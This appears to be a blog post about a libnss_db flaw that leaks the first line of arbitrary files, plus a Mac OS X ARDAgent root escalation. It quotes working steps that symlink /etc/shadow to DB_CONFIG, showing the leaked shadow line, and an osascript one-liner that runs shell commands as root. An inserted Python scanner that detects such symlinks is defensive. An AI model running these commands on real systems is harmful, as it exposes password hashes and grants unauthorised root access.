The GNU 'libnss_db' library is prone to a local information-disclosure vulnerability.
Local attackers can exploit this issue to read the first line of arbitrary local files. This may lead to further attacks.
libnss_db 2.2.3 is vulnerable; other versions may also be affected.
I was not able to reproduce this on my machine as I did not already have the libnss-db package installed, and the package for my distro has already been fixed, so it does no good to install it.
The discussion shows this as an example:
    sudo apt-get install libnss-db
    sudo /etc/init.d/nscd stop    # in case nscd is installed
    sudo ln -s /etc/shadow DB_CONFIG
    line 1: root:*:14553:0:99999:7:::: incorrect name-value pair
Now if you already have sudo(8) privs to stop/start init.d services and use ln(1), I'm guessing there are probably easier ways of obtaining root. Every attack vector should be corrected, but this just seems like shooting fish in a barrel with sudo privs as such.
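A defender-side check related to the steps quoted above, added here as an example and not part of the original post or of libnss_db: it walks a directory tree and reports symlinks named DB_CONFIG whose target belongs to another user or is not world-readable. The function names, the two heuristics and the temporary sample tree are assumptions constructed for illustration.

```python
import os
import stat
import tempfile

LINK_NAME = "DB_CONFIG"  # file name used in the steps quoted above

def find_suspicious_links(root):
    """Return (link, target, reasons) for DB_CONFIG symlinks under root whose
    target is owned by another user or is not world-readable."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root, followlinks=False):
        if LINK_NAME not in dirnames + filenames:
            continue
        link = os.path.join(dirpath, LINK_NAME)
        link_st = os.lstat(link)
        if not stat.S_ISLNK(link_st.st_mode):
            continue  # a regular DB_CONFIG file is not the pattern of interest
        target = os.path.realpath(link)
        try:
            target_st = os.stat(target)
        except OSError:
            continue  # dangling link: nothing to read
        reasons = []
        if target_st.st_uid != link_st.st_uid:
            reasons.append("target owned by another user")
        if not target_st.st_mode & stat.S_IROTH:
            reasons.append("target not world-readable")
        if reasons:
            findings.append((link, target, reasons))
    return findings

def demo():
    """Build a constructed directory tree and scan it."""
    with tempfile.TemporaryDirectory() as root:
        secret = os.path.join(root, "secret")  # stands in for /etc/shadow
        public = os.path.join(root, "public")
        for path, mode in ((secret, 0o600), (public, 0o644)):
            with open(path, "w") as fh:
                fh.write("constructed sample line\n")
            os.chmod(path, mode)
        for sub, target in (("a", secret), ("b", public)):
            os.mkdir(os.path.join(root, sub))
            os.symlink(target, os.path.join(root, sub, LINK_NAME))
        os.mkdir(os.path.join(root, "c"))
        open(os.path.join(root, "c", LINK_NAME), "w").close()  # regular file
        return [(os.path.relpath(l, root), os.path.basename(t), r)
                for l, t, r in find_suspicious_links(root)]

if __name__ == "__main__":
    for finding in demo():
        print(finding)
```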
Unfortunately, this is one of those root exploits that's so simple, you don't even need a canned 'sploit to hit. This is one you can write off the top of your head. Ouch!
Half the Mac OS X boxes in the world (confirmed on Mac OS X 10.4 Tiger and 10.5 Leopard) can be rooted through AppleScript: osascript -e 'tell app "ARDAgent" to do shell script "whoami"'; Works for normal users and admins, provided the normal user wasn't switched to via fast user switching. Secure? I think not.
This does, however, require physical access to the box. I've found that you can generally crack anything you have physical access to.